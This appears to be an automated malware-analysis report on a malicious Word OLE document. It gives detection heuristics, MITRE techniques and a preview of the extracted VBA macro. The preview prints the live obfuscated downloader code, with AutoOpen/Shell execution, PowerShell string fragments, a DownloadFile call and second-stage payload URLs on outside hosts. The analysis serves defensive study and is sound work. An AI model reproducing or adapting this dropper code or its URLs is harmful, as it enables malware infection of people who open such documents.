MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious OLE document containing VBA macros. The AutoOpen macro executes a Shell() call, which is highly suspicious. The script attempts to download a second-stage payload from the reconstructed URL: "leilKongksgyk+gyktafforgyk+gykmgyk+gyk/9kZQ/Uqn.Sgyk+gykic8cQSF1dFEa2XJTpKzA56YS". This indicates a downloader or dropper functionality.
Heuristics 7
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 86370 bytes |
SHA-256: 0f25d3132a32c6d2889d70223b970ed5fb7fe9d67192e5b1e6ba4947f9c99960 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "rwNzzIuMI"
Function hJpIJMzl()
On Error Resume Next
EVDzaXop = oGnrhXmQro - CBool(KvFiFDqzXBX) * 216045258 / Sqr(TvRoDUAsjkI) + oVlGOFlmoIRkSD / Atn(9898) * sQYbXRjUvQ - CDate(376) - iwqvranLqjRk / 3 + SQllKijWAwIc / IkcIBqqf
KmqzJLi = ZsrXnRwK - CBool(EAsUXOQRRS) * 216045258 / Sqr(JLHtbnJOcp) + qOfkXOno / Atn(9898) * vcnZPjfmODBD - CDate(376) - XzNlzwA / 3 + khiuJdom / BddkcjYhdvHXz
IJzUovVLhC = bAtnMiPY + Mid("OcGCAbLe g'+'yk*mDr*gyk).NamE[3,11'+',2]-jOii'+'lK+ilKNgykgyk)ilK) -CrEpLAcE ilKgykilK,[CHAr'+']39 -REplaCe ([CHAr]67+[CHAr]87+['+'CHAr]54),[CHAr]124) )').REPLaCe(([chaR]105+[chaR]108+[chaR]75),[stRINGtSYjzIY", 5, 197) + JdTSVVu
KrXVK = ovtRrzGNoa - CBool(oJHjuKRjMiA) * 216045258 / Sqr(TjRDjhibtEvc) + ssniPnHhvWzcv / Atn(9898) * rYGTonNZk - CDate(376) - uXfFzmjNfq / 3 + RiBzvsA / KRanTrCnlH
LZfkATtcrQO = FpSzSNzOiUdTI - CBool(wJcijHiswj) * 216045258 / Sqr(pwNkNdJOA) + LMphwpGsKzJ / Atn(9898) * ZtmPWJANMtijcP - CDate(376) - iVrTEIrlzmBj / 3 + YzljFqYUz / GANmPRdFEhDcXT
BRQbcDLn = CaIUjLOw - CBool(wFrOkJQMFnqROX) * 216045258 / Sqr(diIRIhPPtPP) + FUIwnlJojGqa / Atn(9898) * dsQEDvnCc - CDate(376) - ACzoRiqzwUbLs / 3 + rDjEizXsiAipzK / UbicdHtpwrFpI
ohQOzERzd = cSINorHBiJmlz + Mid("ssVMhjOcRzMz6G2V+'+'ilKkhttpgyk+gyk://leilK+ilKongyk+gyksgyk+gyktafforgyk+gykd.cogyk+gykmgyk+gyk/9kZQ/Uqn.Sgyk+gykp'+'gyilK+ilKk+gykic8cQSF1dFEa2XJTpKzA56YS", 17, 117) + LZuFVsu
iovFH = EqhHpdUZjpM - CBool(zilqRjYk) * 216045258 / Sqr(rWcTTjzCO) + cREBArNIUlaiwC / Atn(9898) * ibSrmvwi - CDate(376) - NUEoVwXX / 3 + tkqvclwDYD / sMZZJoEfKbAijr
fppZL = pGBGDcTCPjfLLd - CBool(CqUJMVCDl) * 216045258 / Sqr(KUfDFoCYS) + VXpVIVq / Atn(9898) * XNczFrb - CDate(376) - HnCYmCQ / 3 + sHnzKsdnsYriA / AqfwjXmLPocBjP
lKDGkzhawJT = sMttFGDpGLimf - CBool(pCWHpFFwSsdj) * 216045258 / Sqr(YmkHuFj) + qPJMNjJZjD / Atn(9898) * PwiwYYpbmtuB - CDate(376) - WGiDWEkhz / 3 + wnMucZwYl / tTDtnLjEducwO
vLqwQjUpbd = fmZmYNDJCSUjz + Mid("a3i8slhTqb8IUCil6MMhBd98TGlNuJlK = Uqg'+'yk+gykngyk+gyk'+'h'+'tgyk+gyktp://gyk+gykwgyk+gykww.manuelgyk+gykaponilK+ilKgyk+gykoilK+ilKmagyk+gykrenco.gyk+gykro/bWYGl", 31, 128) + siWuiTBvfih
RMsCjaJFUCw = uSSHwcBirt - CBool(kpGhAwDImLs) * 216045258 / Sqr(WtEhswWJLORwG) + XBWzHoFBnz / Atn(9898) * iojzXcK - CDate(376) - iwNuvIk / 3 + kTVYIabYBm / DEiVGHcKKpLo
LLSfrjSC = VpnawsaqPidTqs - CBool(SCNfrAtL) * 216045258 / Sqr(zipVUjdJjFMJcK) + hUDTEjKN / Atn(9898) * cfLVkdwbdrdN - CDate(376) - FWfETkk / 3 + DpsEzXzZHMm / GspYIZGIkf
ITlpjHqq = vaHnSwZfYfjRLw - CBool(OtMwflNnohjDzj) * 216045258 / Sqr(DwBAjBCUH) + wnwCiIlINuCYt / Atn(9898) * KinTFmvcwJb - CDate(376) - PKSwMZEDhwQk / 3 + ZuujmNi / apzOiPU
LVStWdi = HzccJHaqXTVh + Mid("1pFrKodzh8OciSACWLljYNK+ilKnc.'+'DownloilK+ilKadFgZ5vrVTzwHWENQ5XjH", 23, 28) + ZwHMIwkpG
PcCBLnIGqi = jviPhozQacCZ - CBool(TQmFzCVfqrwMj) * 216045258 / Sqr(wtdcuXDL) + SIQlHwMt / Atn(9898) * TzErnAJ - CDate(376) - KGqEiCAjDWzA / 3 + BmIITziQ / iiwsthCEG
wdFiXSih = odKOzARzBciz - CBool(wGJhYvSnTk) * 216045258 / Sqr(ZGzhCdmah) + MtEOIob / Atn(9898) * kaPWXzrmNS - CDate(376) - vvVttoqC / 3 + zXqHRPmNETPG / SiJADiAqPPTTm
hhFUmYcI = XLFqISiwPUhvno - CBool(EjrSMJIPFwcU) * 216045258 / Sqr(VmZruRZ) + wuwzaFKu / Atn(9898) * AdYKikLI - CDate(376) - nOvAtjw / 3 + dcvpBWPcGp / UmDwVtwwwvqCN
bHpTcGcNS = SMNzVEkGQEE + Mid("jvlztX1JTddZoEmomwZeNv:COmsPE'+'c[4,15,25]-JoiNilKilK) ( ((ilK ('+'gykBgyk+gilK+ilKykvugyk+gykfragyk+gJzPPSpKEZFn534dKU1w", 20, 83) + OtvRNwjTDaR
tUofzm = qzKZRmrX - CBool(jIEILdhu) * 216045258 / Sqr(ADdmjtl) + CuhIWofF / Atn(9898) * OutzUAuVaswaoM - CDate(376) - URSihDQRoKjw / 3 + EMTZDPPnAEjDi / JAmhNhAnF
kAapXoicz = nhEmipISFlXr - CBool(CtYMEQSZz) * 216045258 / Sqr(vaYPACi) + uhliGBjMHlUAhI / Atn(9898) * womlTzdzInj - CDate(376) - MJaHPWlc / 3 + hYnWdrIj / zSnwZaN
EJjsUnoVjqD = fwmGQBdWPpRG
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.